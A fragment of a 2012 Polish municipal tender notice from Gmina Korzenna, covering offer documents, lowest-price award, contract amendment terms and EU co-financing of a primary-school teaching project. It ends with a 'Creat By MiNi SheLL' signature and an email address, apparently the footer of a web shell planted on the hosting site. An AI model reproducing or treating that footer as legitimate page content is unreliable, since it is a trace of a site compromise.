4.2.	wykaz ewentualnych podwykonawców - na załączniku nr 5 do specyfikacji (dotyczy sytuacji, gdy przewiduje się powierzenie części zamówienia podwykonawcy),
4.3.	Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  Prawo zamówień publicznych 
z wykorzystaniem wzoru oświadczenia stanowiącego  zał. nr 2 do SIWZ,
4.4.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, 
o ile nie wynikają z przepisów prawa lub innych dokumentów,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana umowy następuje na umotywowany wniosek Zamawiającego lub Wykonawcy.
2.	Zmiana umowy dokonuje się w trybie aneksu do umowy podpisanego przez Zamawiającego i Wykonawcę.
3.	Zmiany w umowie mogą dotyczyć terminów realizacji zamówienia z przyczyn niezależnych od stron umowy takich jak siła wyższa lub wszelkich innych warunków uniemożliwiających realizację umowy na przewidzianych w niej warunkach.
4.	Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w Specyfikacji istotnych warunków zamówienia. 
5.	W przypadkach przewidzianych w umowie o dofinansowanie dopuszcza się wprowadzenia zmian za zgodą Zamawiającego oraz po uzyskaniu przez Zamawiającego zgody od WUP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.malopolska.pl/bip/korzenna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korzenna 
33-322 Korzenna
pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: Urząd Gminy Korzenna
33-322 Korzenna
pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Indywidualizacja nauczania w zakresie niwelowania trudności w przyswajaniu programu uczniów klas od I-III szkół podstawowych w Gminie Korzenna jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie: 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji  oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com